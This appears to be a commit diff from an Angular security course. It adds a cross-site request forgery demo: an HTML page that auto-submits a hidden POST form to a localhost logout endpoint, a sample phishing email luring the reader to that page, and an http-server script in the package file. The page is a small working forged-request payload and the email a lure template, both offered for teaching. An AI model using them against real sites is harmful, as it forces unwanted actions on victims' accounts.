Angular Security course

Author: jhades

csrf/csrf-page.html

@@ -0,0 +1,23 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>CSRF Demo Page</title>
+</head>
+<body>
+
+<h1>GOTCHA!!!</h1>
+
+
+<form id="csrf-form" method='POST' action='https://localhost:4200/api/logout' >
+
+</form>
+
+<script>
+
+    document.getElementById("csrf-form").submit();
+
+</script>
+
+</body>
+</html>

csrf/email.txt

@@ -0,0 +1,19 @@
+
+
+
+Hello,
+
+   Let's simulate a Cross Site Request Forgery (CSRF for short) Attack!
+
+   Click this link -> http://localhost:8080/csrf/csrf-page.html
+
+   This would normally send you to a domain under the attacker control,
+
+   but here we sent it to localhost as a demo.
+
+Enjoy!
+
+
+
+
+

package-lock.json

@@ -17,6 +17,7 @@
     "jwt-check-hs256": "node ./demos/jwt-check-hs256.js",
     "jwt-rs256": "node ./demos/jwt-rs256.js",
     "jwt-check-rs256": "node ./demos/jwt-check-rs256.js",
+    "csrf-server": "./node_modules/.bin/http-server -c-1 .",
     "build": "ng build",
     "test": "ng test",
     "lint": "ng lint",
@@ -41,6 +42,7 @@
     "command-line-args": "^4.0.6",
     "cookie-parser": "^1.4.3",
     "core-js": "^2.4.1",
+    "http-server": "^0.10.0",
     "jsonwebtoken": "^7.4.2",
     "moment": "^2.18.1",
     "nodemon": "^1.11.0",